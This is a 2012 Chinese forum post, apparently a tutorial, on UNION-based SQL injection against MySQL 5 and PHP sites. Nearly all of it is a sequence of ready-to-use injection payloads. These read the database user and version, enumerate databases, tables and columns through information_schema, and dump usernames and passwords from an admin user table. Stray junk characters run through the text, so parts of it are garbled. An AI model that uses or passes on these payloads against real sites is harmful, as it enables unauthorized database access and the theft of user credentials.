$ a# d1 l7 k1 F9 j. |* ^$ N教程内容:Mysql 5+php 注入
$ R4 `7 S7 S1 n: M& G& e b, U k, L
) D' B; e: l2 ]: j1 C9 D4 W
# }. [% x3 `( w( c
6 ]% t& V9 b0 m c' S一.查看MYSQL基本信息(库名,版本,用户)% V# i' r) p! N; T& }
% ]' `/ J- \1 M* A6 eand 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
; c% ?( q+ L# O, C( S: Q! L" b" ]" c! @9 r8 q, [
二.查数据库1 B* O- O* J/ \/ z2 {" U9 v
: |) D0 W8 v; }6 f3 c
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*% y6 S7 F% ?; X7 d/ C2 ?; f
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。# x2 c- ]3 `3 z8 `
5 T9 G& }- O4 W1 l
三.暴表
# Q; D- v/ c5 N5 ^" O! l: }, S" d0 \+ r: f3 P5 f+ ~
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*. o% _$ B$ W, d, m; I3 O$ r
; d$ d6 h9 q0 y* K
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。! \ L& i" m6 `
( t0 `, S# P+ i. X+ N8 X四.暴字段
# ?8 u- j5 C* I# M' _ w1 W* A1 d: q1 s0 X T3 s1 _; v1 V
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
# R+ t N" e! l! M+ f/ x) L2 Y' F
. J( A3 Y# q! O) _limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
0 d v% Y$ I- T0 R% Z( |/ Z1 v" ~, r5 \/ `7 N
五.暴数据% V3 C4 S+ l9 M) L) u2 s+ A* q4 v; `2 u
( F8 ?: e0 @# u: \and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
: A/ ^8 p j" L9 A; D/ C% C/ T+ y) `# p) C1 l# L
& `# I7 H+ H+ a4 ?% [这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。" l' D. O9 _/ \5 z& u/ m
|
发表于 2012-9-13 16:27:53
收藏
支持
反对